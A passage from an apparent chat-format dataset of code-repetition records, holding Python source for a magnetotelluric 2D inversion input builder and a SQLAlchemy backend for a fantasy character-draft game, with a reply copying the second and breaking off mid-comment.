= {}\n for key in properties.keys():\n f = si.interp1d(np.log10(1./zo.freq),properties[key],\n axis = 0,kind = imethod)\n properties_interp[key] = f(np.log10(periodlst))\n\n datafile_data[datfn] = properties_interp\n \n \n self.datafile_data = datafile_data\n self.freq = 1./(np.array(periodlst))\n \n def build_datafiles(self):\n \n if not hasattr(self,'datafile_data'):\n self.build_data()\n dfstrings = {}\n \n for dfile in self.datafile_data.keys():\n datfstr = '{:<3} '.format(len(self.freq))+\\\n ' '.join([str(i) for i in self.parameters_data['mode']])+'\\n'\n for pv in range(len(self.freq)):\n datlst = '{0:>12}'.format('%.06f'%(1./(self.freq[pv])))\n for ii in range(2):\n for jj in range(2):\n for pval in ['z_real', 'z_imag', 'z_var']:\n# print self.datafile_data[dfile][pval][pv][ii,jj]\n datlst += '{0:>12}'.format('%.06f'%self.datafile_data[dfile][pval][pv][ii,jj])\n for ii in range(2):\n for pval in ['tipper_real', 'tipper_imag', 'tipper_err']:\n datlst += '{0:>12}'.format('%.06f'%self.datafile_data[dfile][pval][pv][0,ii])\n\n datfstr += ''.join(datlst)+'\\n'\n dfstrings[dfile] = datfstr\n \n self.datafile_strings = dfstrings\n\n def write_datafiles(self):\n \n if not hasattr(self,'datafile_strings'):\n self.build_datafiles()\n \n exlf = open(os.path.join(self.working_directory,self.working_directory,self.exlfile),'w')\n dfkeys=self.datafile_strings.keys()\n dfkeys.sort()\n for dfile in dfkeys:\n f = open(op.join(self.working_directory,self.working_directory,dfile),'w')\n f.write(self.datafile_strings[dfile])\n f.close()\n exlf.write(dfile+'\\n')\n exlf.close()\n\n def write_ctlfile(self):\n ctrf = open(op.join(self.working_directory,self.working_directory,'pb.ctr'),'w')\n \n if type(self.parameters_data['mode']) == str:\n self.parameters_data['mode'] = self.parameters_data['mode'].split(',')\n ef = np.hstack([self.parameters_data['errorfloor'][l].flatten() for l in ['z','tipper']])\n\n \n clist = []\n clist.append(self.exlfile)\n clist.append(self.parameters_ctl['ctl_string']+self.parameters_ctl['units_string']+self.parameters_ctl['quadrants'])\n clist.append(' '.join([str(i) for i in self.parameters_data['mode']]))\n clist.append(' '.join(['0.00' for i in ef]))\n clist.append(self.parameters_ctl['orientation_string'])\n clist.append(self.modelfile)\n clist.append(self.resfile)\n clist.append(self.parameters_ctl['convergence_string'])\n clist.append(self.parameters_ctl['roughness_string'])\n clist.append(self.parameters_ctl['anisotropy_penalty_string'])\n clist.append(self.parameters_ctl['anisotropy_ctl_string'])\n clist.append(self.cvgfile)\n clist.append(self.outfile)\n clist.append(self.pexfile)\n clist.append(self.andfile) \n \n self.controlfile_string = '\\n'.join(clist)\n ctrf.write(self.controlfile_string)\n\n ctrf.close()\n```<|memory_end|>",
"role": "user"
}
] |
```python
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 28 14:06:45 2014
@author: a1655681
"""
import mtpy.modeling.occam2d as o2d
import mtpy.modeling.pek1dclasses as p1dc
import numpy as np
import os
import os.path as op
import pek2dforward as p2d
import string
import scipy.interpolate as si
import mtpy.utils.filehandling as fh
import mtpy.core.edi as mtedi
import mtpy.modeling.pek2dforward as p2d
class Model():
"""
class for creating and reading model files
"""
def __init__(self, working_directory, **input_parameters):
self.working_directory = working_directory
self.edi_directory = None
self.occam_configfile = None
self.parameters_ctl = {}
self.parameters_ctl['ctl_string'] = 'TAB'
self.parameters_ctl['units_string'] = 'PR'
self.parameters_ctl['quadrants'] = '++--'
self.parameters_ctl['orientation_string'] = '0 0.d0 0.d0'
self.parameters_ctl['convergence_string'] = '1 6 1.d-4'
self.parameters_ctl['roughness_string'] = '2 1000.0d0 1000.0d0 0.d0'
self.parameters_ctl['anisotropy_penalty_string'] = '2 1000.d0 0.d0'
self.parameters_ctl['anisotropy_ctl_string'] = '1.d0 1.d0 1.d0'
self.parameters_model = {}
self.parameters_model['no_sideblockelements'] = 5
self.parameters_model['no_bottomlayerelements'] = 4
self.parameters_model['firstlayer_thickness'] = 100
#model depth is in km!
self.parameters_model['model_depth'] = 100
self.parameters_model['no_layers'] = 25
self.parameters_model['max_blockwidth'] = 1000
self.parameters_data = {}
self.parameters_data['strike'] = 0.
self.parameters_data['errorfloor'] = dict(z=np.array([[0.05,0.05],
[0.05,0.05]]),
tipper=np.array([0.02,0.02]))
self.parameters_data['errorfloor_type'] = 'offdiagonals'# offdiagonals or relative
self.parameters_data['max_no_frequencies'] = 50
self.parameters_data['mode'] = [1,1,1,1,1,1]
self.n_airlayers = 5
self.mesh = None
self.meshlocations_x = None
self.meshlocations_z = None
self.meshblockwidths_x = None
self.meshblockthicknesses_z = None
self.profile_easts = None
self.profile_norths = None
self.inversion1d_dirdict = {}
self.inversion1d_masterdir = '.'
self.inversion1d_modelno = 0
self.inversion1d_imethod = 'nearest'
self.idir_basename = 'aniso'
self.binsize_resistivitylog10 = 1.
self.binsize_strike = 20.
self.build_from_1d = False
self.rotation = 0.
self.modelfile = 'model.dat'
self.anisotropy_min_depth = 0.
self.strike = 0.
self.edifiles = []
self.Data = None
self.modelfile = 'model'
self.resfile = 'pb.res'
self.cvgfile = 'pb.cvg'
self.outfile = 'pb.out'
self.pexfile = 'pb.pex'
self.andfile = 'pb.and'
self.exlfile = 'pb.exl'
update_dict = {}
#correcting dictionary for upper case keys
input_parameters_nocase = {}
for key in input_parameters.keys():
input_parameters_nocase[key.lower()] = input_parameters[key]
update_dict.update(input_parameters_nocase)
for dictionary in [self.parameters_model,self.parameters_data]:
for key in dictionary.keys():
if key in update_dict:
#check if entry exists:
try:
value = float(update_dict[key])
dictionary[key] = value
except:
value = update_dict[key]
dictionary[key] = value
if type(value) in [str]:
if value.strip().lower()=='none':
dictionary[key] = None
for key in update_dict:
try:
value = getattr(self,key)
if update_dict[key] is not None:
try:
value = float(update_dict[key])
setattr(self,key,value)
except:
value = update_dict[key]
setattr(self,key,value)
if type(value) in [str]:
if value.strip().lower()=='none':
setattr(self,key,None)
except:
continue
self.input_parameters = update_dict
print self.idir_basename
if self.edifiles == []:
if self.edi_directory is not None:
try:
self.edifiles = [op.join(self.edi_directory,
f) for f in os.listdir(self.edi_directory)]
except IOError:
print("failed to find edi directory")
pass
def build_inputfiles(self):
inversiondir = fh.make_unique_folder(self.working_directory,basename=self.idir_basename)
os.mkdir(op.join(self.working_directory,inversiondir))
self.working_directory = inversiondir
self.build_model()
self.write_modelfile()
self.write_datafiles()
self.write_ctlfile()
def read_model(self):
"""
use pek2d forward python setup code to read the model
"""
model = p2d.Model(working_directory = self.working_directory,
**self.input_parameters)
model.read_model()
for attr in ['meshblockwidths_x', 'meshblockthicknesses_z',
'meshlocations_x', 'meshlocations_z',
'modelblocknums', 'resistivity', 'sds',
'station_indices','modelfile_reslines',
'n_airlayers']:
try:
setattr(self,attr,getattr(model,attr))
except:
print "can't assign attribute {}".format(attr)
def read_outfile(self,chunk=1750,linelength=52):
"""
read the outfile from the reverse end and get out last iteration
"""
# open outfile
outfile = open(op.join(self.working_directory,self.outfile))
if not hasattr(self,'modelblocknums'):
self.read_model()
elif self.modelblocknums is None:
self.read_model()
mb = np.sum(self.modelfile_reslines[:,-6:].astype(int))
# read backwards from end of file, in chunks of 175, until a 4-column row is found
nn = 1
while True:
try:
outfile.seek(-nn, 2)
outfile.readline()
line = outfile.readline().strip().split()
n = outfile.tell()
if len(line) == 4:
break
nn += chunk
except:
print "invalid outfile, cannot read resistivity values from outfile yet"
return
m = 0
while line[0] != '1':
outfile.seek(n-linelength*m)
line = outfile.readline().strip().split()
m += 1
self.outfile_reslines = np.zeros([mb,4])
for m in range(mb):
self.outfile_reslines[m] = [float(ll) for ll in line]
line = outfile.readline().strip().split()
# iterate through resistivity and assign new values if they have been inverted for
n = 0
nair = self.n_airlayers + 1
nx,nz = len(self.meshlocations_x), len(self.meshlocations_z)
for i in range(nz - nair):
for j in range(nx - 1):
for k in range(6):
mfi = (nx - 1)*i + j + 1
if self.modelfile_reslines[mfi,k+8] == '1':
if k < 3:
self.resistivity[i+nair-1,j,k] = self.outfile_reslines[n,2]
else:
self.sds[i+nair-1,j,k-3] = self.outfile_reslines[n,2]
n += 1
# print i,j,k,n
def build_model(self):
"""
build model file string
"""
# build a forward model object
ro = p2d.Model(self.working_directory,**self.input_parameters)
ro.build_model()
# assign relavent parameters to pek 2d inverse object
for at in ['stationlocations','parameters_model',
'meshlocations_x','meshlocations_z',
'meshblockwidths_x','meshblockthicknesses_z',
'profile_easts','profile_norths','Data',
'meshblockthicknesses_zair','meshlocations_zair']:
attvalue = getattr(ro,at)
setattr(self,at,attvalue)
ro.get_station_meshblock_numbers()
if ro.build_from_1d:
# try:
ro.get_1d_results()
ro.interpolate_1d_results()
for at in ['inversion1d_dirdict','inversion1d_modelno',
'models1d','resistivity','stationlocations',
'blockcentres_x','blockcentres_z']:
attvalue = getattr(ro,at)
setattr(self,at,attvalue)
# except:
else:
for at in ['resistivity','stationlocations',
'blockcentres_x','blockcentres_z']:
setattr(self,at,getattr(ro,at))
for at in ['inversion1d_dirdict','inversion1d_modelno',
'models1d']:
setattr(self,at,None)
ro.get_station_meshblock_numbers()
self.stationblocknums=ro.stationblocknums
self.build_modelfilestring()
def write_modelfile(self):
if not hasattr(self,'modelfilestring'):
self.build_model()
outfile = open(op.join(self.working_directory,
self.modelfile),'w')
outfile.write(self.modelfilestring)
outfile.close()
def build_modelfilestring(self):
# initialise a list containing info for model file
modelfilestring = []
# add header info
modelfilestring.append('NEW')
modelfilestring.append(' 1')
modelfilestring.append(' 1.000')
# add string giving number of cells:
modelfilestring.append(''.join(['%5i'%i for i in [len(self.meshlocations_x),
len(self.meshlocations_z)+self.n_airlayers,
self.n_airlayers+1]]))
# add strings giving horizontal and vertical mesh steps
meshz = list(self.meshblockthicknesses_zair)+list(self.meshblockthicknesses_z)
for meshstep in [self.meshblockwidths_x,meshz]:
modelfilestring.append\
(p2d.create_multiple_line_string(meshstep,
10,'%10.3f'))
# add resistivity map
rmap = ('%5i'%0*len(self.resistivity[0])+'\n')*self.n_airlayers
rmap += '\n'.join([''.join('%5i'%ii for ii in i) for i in \
np.arange(1,np.size(self.resistivity[:,:,0])+1).reshape(np.shape(self.resistivity)[:2])])
modelfilestring.append(rmap)
# add number of resistivity domains (+1 to include air)
modelfilestring.append('%5i'%(np.size(self.resistivity[:,:,0])+1))
# add dictionary contents, assuming rvertical = rmax, slant and dip zero
# first, air layer, properties always the same
modelfilestring.append(' 0 0 -1.00 0.00 0.00 0.00 0.00 0.00 0 0 0 0 0 0')
# second, dictionary contents
no = 1
for j in range(len(self.resistivity)):
for i in range(len(self.resistivity[j])):
# initialise a list containing resx,resy,strike
rlist = list(self.resistivity[j,i])
# insert resz (assumed to be same as resy)
rlist.insert(2,rlist[1])
# insert dip and slant (assumed zero)
rlist += [0.,0.]
# if rlist[1]/rlist[0] == 1.:
# aniso = ' 0'
# invert_key = ' 1 1 1 0 0 0'
# else:
aniso = ' 1'
invert_key = ' 1 1 1 1 1 0'
modelfilestring.append(''.join(['%5i'%no,aniso]+['%10.2f'%i for i in rlist]+[invert_key]))
no += 1
# append bathymetry index, at this stage only 0 allowed:
modelfilestring.append('%5i'%0)
# append number of calculation points (stations):
modelfilestring.append('%5i'%len(self.stationblocknums))
# append rotation
modelfilestring.append('%10.2f'%self.rotation)
# append station blocknums
modelfilestring.append(p2d.create_multiple_line_string(self.stationblocknums,
5,' %03i'))
modelfilestring.append('%5i'%0)
self.modelfilestring = '\n'.join(modelfilestring)+'\n'
def build_data(self):
imethod = 'nearest'
ftol = 0.000001
num_freq = int(self.parameters_data['max_no_frequencies'])
# get minimum and maximum periods
min_val = max([min(1./zo.freq) for zo in self.Data.Z])
max_val = min([max(1./zo.freq) for zo in self.Data.Z])
periodlst = []
for period in 1./self.Data.frequencies:
if len(periodlst) > 0:
# find the difference between the period and the closest period already in the list
closest_period_diff = np.amin(np.abs(np.array(periodlst)-period))
else:
# otherwise set period difference to a large number
closest_period_diff = 99999
# check whether the fractional difference is bigger than the tolerance set
# print closest_period_diff,closest_period_diff/period,
if closest_period_diff/period > ftol:
if min_val <= period <= max_val:
periodlst.append(period)
periodlst.sort()
# print periodlst
# if number of periods still too long based on the number of frequencies set
# then take out some frequencies
n = 2
new_periodlst = periodlst
while len(new_periodlst) > num_freq:
new_periodlst = [periodlst[int(p)] for p in range(len(periodlst)) if p%n == 0]
n += 1
periodlst = new_periodlst
mode = self.parameters_data['mode']
if type(mode) in [str]:
mode = mode.split(',')
self.parameters_data['mode'] = mode
datafile_data = {}
for ee,zo in enumerate(self.Data.Z):
to=self.Data.Tipper[ee]
datfn = str(self.stationblocknums[ee])+'_'+self.Data.stations[ee]+'.dat'
zerr = zo.zerr
z = zo.z
ze_rel = zerr/np.abs(z)
terr = to.tippererr
t = to.tipper
te_rel = terr/np.abs(t)
# set error floors
efz = self.parameters_data['errorfloor']['z']
eft = self.parameters_data['errorfloor']['tipper']
eftype = self.parameters_data['errorfloor_type']
if eftype in ['relative','offdiagonals']:
for i in range(2):
for j in range(2):
ze_rel[ze_rel<efz[i,j]] = efz[i,j]
te_rel[te_rel<eft[i]] = eft[i]
zerr = ze_rel * np.abs(z)
terr = te_rel * np.abs(t)
if eftype == 'offdiagonals':
for i in range(2):
for iz in range(len(z)):
if zerr[iz,i,i] < zerr[iz,i,1-i]:
zerr[iz,i,i] = zerr[iz,i,1-i]
zvar = zerr**2
# create interpolation functions to interpolate z and tipper values
properties = dict(z_real=np.real(z),z_imag=np.imag(z),
z_var=zvar,tipper_real=np.real(t),
tipper_imag=np.imag(t),tipper_err=terr)
properties_interp = {}
for key in properties.keys():
f = si.interp1d(np.log10(1./zo.freq),properties[key],
axis = 0,kind = imethod)
properties_interp[key] = f(np.log10(periodlst))
datafile_data[datfn] = properties_interp
self.datafile_data = datafile_data
self.freq = 1./(np.array(periodlst))
def build_datafiles(self):
if not hasattr(self,'datafile_data'):
self.build_data()
dfstrings = {}
for dfile in self.datafile_data.keys():
datfstr = '{:<3} '.format(len(self.freq))+\
' '.join([str(i) for i in self.parameters_data['mode']])+'\n'
for pv in range(len(self.freq)):
datlst = '{0:>12}'.format('%.06f'%(1./(self.freq[pv])))
for ii in range(2):
for jj in range(2):
for pval in ['z_real', 'z_imag', 'z_var']:
# print self.datafile_data[dfile][pval][pv][ii,jj]
datlst += '{0:>12}'.format('%.06f'%self.datafile_data[dfile][pval][pv][ii,jj])
for ii in range(2):
for pval in ['tipper_real', 'tipper_imag', 'tipper_err']:
datlst += '{0:>12}'.format('%.06f'%self.datafile_data[dfile][pval][pv][0,ii])
datfstr += ''.join(datlst)+'\n'
dfstrings[dfile] = datfstr
self.datafile_strings = dfstrings
def write_datafiles(self):
if not hasattr(self,'datafile_strings'):
self.build_datafiles()
exlf = open(os.path.join(self.working_directory,self.working_directory,self.exlfile),'w')
dfkeys=self.datafile_strings.keys()
dfkeys.sort()
for dfile in dfkeys:
f = open(op.join(self.working_directory,self.working_directory,dfile),'w')
f.write(self.datafile_strings[dfile])
f.close()
exlf.write(dfile+'\n')
exlf.close()
def write_ctlfile(self):
ctrf = open(op.join(self.working_directory,self.working_directory,'pb.ctr'),'w')
if type(self.parameters_data['mode']) == str:
self.parameters_data['mode'] = self.parameters_data['mode'].split(',')
ef = np.hstack([self.parameters_data['errorfloor'][l].flatten() for l in ['z','tipper']])
clist = []
clist.append(self.exlfile)
clist.append(self.parameters_ctl['ctl_string']+self.parameters_ctl['units_string']+self.parameters_ctl['quadrants'])
clist.append(' '.join([str(i) for i in self.parameters_data['mode']]))
clist.append(' '.join(['0.00' for i in ef]))
clist.append(self.parameters_ctl['orientation_string'])
clist.append(self.modelfile)
clist.append(self.resfile)
clist.append(self.parameters_ctl['convergence_string'])
clist.append(self.parameters_ctl['roughness_string'])
clist.append(self.parameters_ctl['anisotropy_penalty_string'])
clist.append(self.parameters_ctl['anisotropy_ctl_string'])
clist.append(self.cvgfile)
clist.append(self.outfile)
clist.append(self.pexfile)
clist.append(self.andfile)
self.controlfile_string = '\n'.join(clist)
ctrf.write(self.controlfile_string)
ctrf.close()
```
|
[
{
"content": "Here is the source code:\n```python\nimport json\nfrom models import Character, User, Draft, DraftTicket, Episode, DraftHistory, Rubric, Score\nfrom sqlalchemy import or_, exc\nfrom sqlalchemy.orm import lazyload\nfrom datetime import timedelta, datetime\nimport pandas as pd\nimport numpy as np\n\n\ndef handle_event(msg_type, msg, db_session=None):\n print(\"handling %s\" % msg_type)\n handlers = {\n \"DRAFT\": draft,\n \"RELEASE\": release,\n \"UPDATE_USER\": update_user,\n }\n print \"msg_type: %s\" % msg\n if msg_type in handlers.keys():\n response = handlers[msg_type](msg, db_session)\n else:\n response = {\"error\": \"no handler implemented for %s\" % msg_type}\n return response\n\ndef initial_data(user_identifier, db_session):\n rubric = format_rubric(db_session)\n characters = format_characters(db_session)\n scores = format_scores(db_session)\n owners = format_owners(db_session)\n \n user_data = format_user_data(user_identifier, db_session)\n can_draft = format_can_draft(user_identifier,db_session)\n can_release = format_can_release(user_identifier,db_session)\n \n return [rubric, characters, scores, owners, can_draft, user_data]\n\ndef format_owners(db_session):\n result = db_session.query(User).order_by(User.name).values(User.name)\n owners = [{\"username\": user[0]} for user in result]\n return {\"type\": \"OWNERS\", \"owners\": owners}\n\n# The full list of characters\ndef format_rubric(db_session):\n rubric = {}\n result = db_session.query(Rubric).order_by(Rubric.kind, Rubric.points).values(Rubric.description, Rubric.kind, Rubric.points, Rubric.canon)\n for row in result:\n description, kind, points, canon = row\n if not kind in rubric.keys():\n rubric[kind] = []\n rubric[kind].append({\"description\":description, \"points\":points, \"kind\": canon})\n\n return {\"type\": \"RUBRIC\", \"rubric\": [{\"title\": title, \"data\": data} for title, data in rubric.items()]}\n\ndef format_characters(db_session):\n result = db_session.query(Character).outerjoin(Draft).outerjoin(User).order_by(Character.name).values(Character.id, Character.name, Character.description, User.name)\n return {\"type\": \"CHARACTERS\", \"characters\": [{\"id\": item[0], \"name\": item[1], \"description\": item[2], \"user\": item[3]} for item in result if item[0]]}\n\n# user details for the front end display\ndef format_user_data(user_identifier, db_session):\n print \"selecting user for user identifier: %s\" % (user_identifier)\n user = db_session.query(User).filter(User.identifier == user_identifier).first()\n return {\"type\": \"USER_DATA\", \"user_data\": {\"email\": user.email, \"username\": user.name, \"seat_of_power\": user.seat_of_power, \"house_words\": user.house_words}}\n\ndef format_scores(db_session):\n query = db_session.query(Score).outerjoin(Character).options(lazyload('rubric'))\n raw_report = query.order_by(Score.episode_number, Character.name).all()\n\n scores = [{\n \"id\": score.id,\n \"episode_number\": score.episode_number,\n \"owner\": score.user.name if score.user else \"\",\n \"notes\": score.notes,\n \"points\": score.points,\n \"bonus\": score.bonus,\n \"score\": score.points + (score.bonus or 0),\n \"kind\": score.rubric.kind,\n \"canon\": score.rubric.canon,\n \"description\": score.rubric.description,\n \"character_name\": score.character.name,\n } for score in raw_report]\n\n return {\"type\":\"SCORES\", \"scores\": scores}\n \n# action to draft character from available characters\ndef draft(data, db_session):\n user_identifier = data[\"data\"][\"user_identifier\"]\n character_id = data[\"data\"][\"character_id\"]\n \n user = db_session.query(User).filter(User.identifier == user_identifier).first()\n if not user:\n raise Exception(\"No user found with identifier %s\" % user_identifier)\n \n if not user.can_draft(db_session):\n return {\"can_draft\": False}\n \n draft_ticket = user.next_draft_ticket(db_session)\n\n if draft_ticket:\n if not draft_ticket.user_identifier == user_identifier:\n raise Exception(\"It is not %s's turn to draft\" % user_identifier)\n \n character = db_session.query(Character).outerjoin(Draft).filter(Draft.id == None).filter(Character.id == character_id).first()\n \n result = \"Drafting %s for %s\" % (character, user_identifier)\n\n user.draft(character)\n draft_history = {\n \"character_id\": character.id,\n \"user_id\": user.id\n }\n db_session.execute(DraftHistory.__table__.insert(), draft_history)\n if draft_ticket:\n db_session.delete(draft_ticket)\n \n db_session.commit()\n db_session.query(Character).outerjoin(Draft).filter(Draft.id == None).values(Character.id, Character.name)\n return \"%s drafted %s\" % (user.name, character.name)\n\n# action to release a character from the draft for this user_identifier\ndef release(data, db_session):\n user_identifier = data[\"data\"][\"user_identifier\"]\n character_id = data[\"data\"][\"character_id\"]\n user = db_session.query(User).filter(User.identifier == user_identifier).first()\n if not user:\n raise Exception(\"No user found with identifier %s\" % user_identifier)\n \n character = db_session.query(Character).filter(Character.id == character_id).first()\n user.release(character)\n draft_history_ids = db_session.query(User).outerjoin(DraftHistory).outerjoin(Character).filter(User.name==user.name, Character.name==character.name).values(DraftHistory.id)\n for draft_history_id in draft_history_ids:\n draft_history = db_session.query(DraftHistory).filter(DraftHistory.id == draft_history_id).update({\"released_at\":datetime.now()})\n db_session.commit()\n \n return \"%s released %s\" % (user.name, character.name)\n\ndef format_can_draft(user_identifier, db_session):\n user = db_session.query(User).filter(User.identifier == user_identifier).first()\n if not user:\n raise Exception(\"No user found with identifier %s\" % user_identifier)\n\n return {\"type\": \"CAN_DRAFT\", \"can_draft\": user.can_draft(db_session)}\n\ndef format_can_release(user_identifier, db_session):\n user = db_session.query(User).filter(User.identifier == user_identifier).first()\n if not user:\n raise Exception(\"No user found with identifier %s\" % user_identifier)\n\n return {\"type\": \"CAN_RELEASE\", \"can_release\": user.can_release(db_session)}\n\ndef generate_score(msg, db_session):\n # Get the character from the unique character name\n character_name = msg['character_name']\n character = db_session.query(Character).filter(Character.name == character_name).first()\n if not character:\n db_session.execute(Character.__table__.insert(), [{\"name\": character_name}])\n character = db_session.query(Character).filter(Character.name == character_name).first()\n # get the episode from the unique episode number\n episode_number = msg['episode_number']\n episode = db_session.query(Episode).filter(Episode.number == episode_number).first()\n \n # get a draft from the draft history. This is a historically idempotent approach\n # ideally we should be able to clear and regenerate the scores at any time based on the draft history data. This depends upon the assumption that no drafts can be overlapping\n draft_history = db_session.query(DraftHistory).join(Character).filter(\n Character.id == character.id,\n DraftHistory.drafted_at < (episode.aired_at - timedelta(hours=4)),\n (or_(DraftHistory.released_at == None, DraftHistory.released_at > episode.aired_at))\n ).first()\n\n # If we found a draft, populate the score with the relevant user information\n if draft_history:\n user = draft_history.user\n user_id = user.id\n draft_id = draft_history.id\n # if we don't find a draft, still create the score, but don't associate it with a \n # user this gives us a sense of the \"points on the table\" that were left because \n # nobody had that character drafted at the time.\n else:\n user_id = None\n draft_id = None\n\n # specify the description, but apply points from the rubric\n # this depends on the assumption that the rubric doesn't change once the\n # game is in motion. If the rubric changes\n rubric_description = msg['rubric_description']\n rubric = db_session.query(Rubric).filter(Rubric.description == rubric_description).first()\n if not rubric:\n db_session.execute(Rubric.__table__.insert(), [{\"description\": rubric_description, \"points\": msg['points'] or 0, \"canon\": \"altfacts\"}])\n rubric = db_session.query(Rubric).filter(Rubric.description == rubric_description).first()\n # bonus can be applied if specified. If there is no bonus, make it 0 for easier summing\n bonus = int(msg['bonus'] or 0)\n\n # notes are to explain why specifically they got this.\n notes = msg['notes']\n \n score_config = {\n \"character_id\": character.id,\n \"draft_id\": draft_id,\n \"user_id\": user_id,\n \"episode_number\": episode.number,\n \"rubric_id\": rubric.id,\n \"points\": rubric.points,\n \"bonus\": bonus,\n \"notes\": notes,\n }\n db_session.execute(Score.__table__.insert(), score_config)\n db_session.commit()\n\ndef update_user(msg, db_session):\n data = {\n \"name\": msg[\"data\"][\"username\"],\n \"seat_of_power\": msg[\"data\"][\"seat_of_power\"],\n \"house_words\": msg[\"data\"][\"house_words\"],\n }\n print data\n try:\n db_session.query(User).filter(User.name == data['name']).update(data)\n db_session.commit()\n # return {\n # \"notify\": \"User %s updated\" % data[\"name\"],\n # \"user_data\": {\"username\": data['name'], \"seat_of_power\": data['seat_of_power'], \"house_words\": data['house_words']},\n # }\n except exc.InternalError, exception:\n reason = exception.message\n print \"Failed because: %s\" % reason\n db_session.rollback()\n return {\"notify\": \"User %s failed to update because %s\" % (data[\"name\"], reason)}\n except exc.IntegrityError, exception:\n reason = exception.message\n print \"Failed because: %s\" % reason\n db_session.rollback()\n return {\"notify\": \"User %s failed to update because %s\" % (data[\"name\"], reason)}\n```\nRepeat it exactly.",
"role": "user"
}
] |
[
{
"content": "Here is the source code:\n<|memory_start|>```python\nimport json\nfrom models import Character, User, Draft, DraftTicket, Episode, DraftHistory, Rubric, Score\nfrom sqlalchemy import or_, exc\nfrom sqlalchemy.orm import lazyload\nfrom datetime import timedelta, datetime\nimport pandas as pd\nimport numpy as np\n\n\ndef handle_event(msg_type, msg, db_session=None):\n print(\"handling %s\" % msg_type)\n handlers = {\n \"DRAFT\": draft,\n \"RELEASE\": release,\n \"UPDATE_USER\": update_user,\n }\n print \"msg_type: %s\" % msg\n if msg_type in handlers.keys():\n response = handlers[msg_type](msg, db_session)\n else:\n response = {\"error\": \"no handler implemented for %s\" % msg_type}\n return response\n\ndef initial_data(user_identifier, db_session):\n rubric = format_rubric(db_session)\n characters = format_characters(db_session)\n scores = format_scores(db_session)\n owners = format_owners(db_session)\n \n user_data = format_user_data(user_identifier, db_session)\n can_draft = format_can_draft(user_identifier,db_session)\n can_release = format_can_release(user_identifier,db_session)\n \n return [rubric, characters, scores, owners, can_draft, user_data]\n\ndef format_owners(db_session):\n result = db_session.query(User).order_by(User.name).values(User.name)\n owners = [{\"username\": user[0]} for user in result]\n return {\"type\": \"OWNERS\", \"owners\": owners}\n\n# The full list of characters\ndef format_rubric(db_session):\n rubric = {}\n result = db_session.query(Rubric).order_by(Rubric.kind, Rubric.points).values(Rubric.description, Rubric.kind, Rubric.points, Rubric.canon)\n for row in result:\n description, kind, points, canon = row\n if not kind in rubric.keys():\n rubric[kind] = []\n rubric[kind].append({\"description\":description, \"points\":points, \"kind\": canon})\n\n return {\"type\": \"RUBRIC\", \"rubric\": [{\"title\": title, \"data\": data} for title, data in rubric.items()]}\n\ndef format_characters(db_session):\n result = db_session.query(Character).outerjoin(Draft).outerjoin(User).order_by(Character.name).values(Character.id, Character.name, Character.description, User.name)\n return {\"type\": \"CHARACTERS\", \"characters\": [{\"id\": item[0], \"name\": item[1], \"description\": item[2], \"user\": item[3]} for item in result if item[0]]}\n\n# user details for the front end display\ndef format_user_data(user_identifier, db_session):\n print \"selecting user for user identifier: %s\" % (user_identifier)\n user = db_session.query(User).filter(User.identifier == user_identifier).first()\n return {\"type\": \"USER_DATA\", \"user_data\": {\"email\": user.email, \"username\": user.name, \"seat_of_power\": user.seat_of_power, \"house_words\": user.house_words}}\n\ndef format_scores(db_session):\n query = db_session.query(Score).outerjoin(Character).options(lazyload('rubric'))\n raw_report = query.order_by(Score.episode_number, Character.name).all()\n\n scores = [{\n \"id\": score.id,\n \"episode_number\": score.episode_number,\n \"owner\": score.user.name if score.user else \"\",\n \"notes\": score.notes,\n \"points\": score.points,\n \"bonus\": score.bonus,\n \"score\": score.points + (score.bonus or 0),\n \"kind\": score.rubric.kind,\n \"canon\": score.rubric.canon,\n \"description\": score.rubric.description,\n \"character_name\": score.character.name,\n } for score in raw_report]\n\n return {\"type\":\"SCORES\", \"scores\": scores}\n \n# action to draft character from available characters\ndef draft(data, db_session):\n user_identifier = data[\"data\"][\"user_identifier\"]\n character_id = data[\"data\"][\"character_id\"]\n \n user = db_session.query(User).filter(User.identifier == user_identifier).first()\n if not user:\n raise Exception(\"No user found with identifier %s\" % user_identifier)\n \n if not user.can_draft(db_session):\n return {\"can_draft\": False}\n \n draft_ticket = user.next_draft_ticket(db_session)\n\n if draft_ticket:\n if not draft_ticket.user_identifier == user_identifier:\n raise Exception(\"It is not %s's turn to draft\" % user_identifier)\n \n character = db_session.query(Character).outerjoin(Draft).filter(Draft.id == None).filter(Character.id == character_id).first()\n \n result = \"Drafting %s for %s\" % (character, user_identifier)\n\n user.draft(character)\n draft_history = {\n \"character_id\": character.id,\n \"user_id\": user.id\n }\n db_session.execute(DraftHistory.__table__.insert(), draft_history)\n if draft_ticket:\n db_session.delete(draft_ticket)\n \n db_session.commit()\n db_session.query(Character).outerjoin(Draft).filter(Draft.id == None).values(Character.id, Character.name)\n return \"%s drafted %s\" % (user.name, character.name)\n\n# action to release a character from the draft for this user_identifier\ndef release(data, db_session):\n user_identifier = data[\"data\"][\"user_identifier\"]\n character_id = data[\"data\"][\"character_id\"]\n user = db_session.query(User).filter(User.identifier == user_identifier).first()\n if not user:\n raise Exception(\"No user found with identifier %s\" % user_identifier)\n \n character = db_session.query(Character).filter(Character.id == character_id).first()\n user.release(character)\n draft_history_ids = db_session.query(User).outerjoin(DraftHistory).outerjoin(Character).filter(User.name==user.name, Character.name==character.name).values(DraftHistory.id)\n for draft_history_id in draft_history_ids:\n draft_history = db_session.query(DraftHistory).filter(DraftHistory.id == draft_history_id).update({\"released_at\":datetime.now()})\n db_session.commit()\n \n return \"%s released %s\" % (user.name, character.name)\n\ndef format_can_draft(user_identifier, db_session):\n user = db_session.query(User).filter(User.identifier == user_identifier).first()\n if not user:\n raise Exception(\"No user found with identifier %s\" % user_identifier)\n\n return {\"type\": \"CAN_DRAFT\", \"can_draft\": user.can_draft(db_session)}\n\ndef format_can_release(user_identifier, db_session):\n user = db_session.query(User).filter(User.identifier == user_identifier).first()\n if not user:\n raise Exception(\"No user found with identifier %s\" % user_identifier)\n\n return {\"type\": \"CAN_RELEASE\", \"can_release\": user.can_release(db_session)}\n\ndef generate_score(msg, db_session):\n # Get the character from the unique character name\n character_name = msg['character_name']\n character = db_session.query(Character).filter(Character.name == character_name).first()\n if not character:\n db_session.execute(Character.__table__.insert(), [{\"name\": character_name}])\n character = db_session.query(Character).filter(Character.name == character_name).first()\n # get the episode from the unique episode number\n episode_number = msg['episode_number']\n episode = db_session.query(Episode).filter(Episode.number == episode_number).first()\n \n # get a draft from the draft history. This is a historically idempotent approach\n # ideally we should be able to clear and regenerate the scores at any time based on the draft history data. This depends upon the assumption that no drafts can be 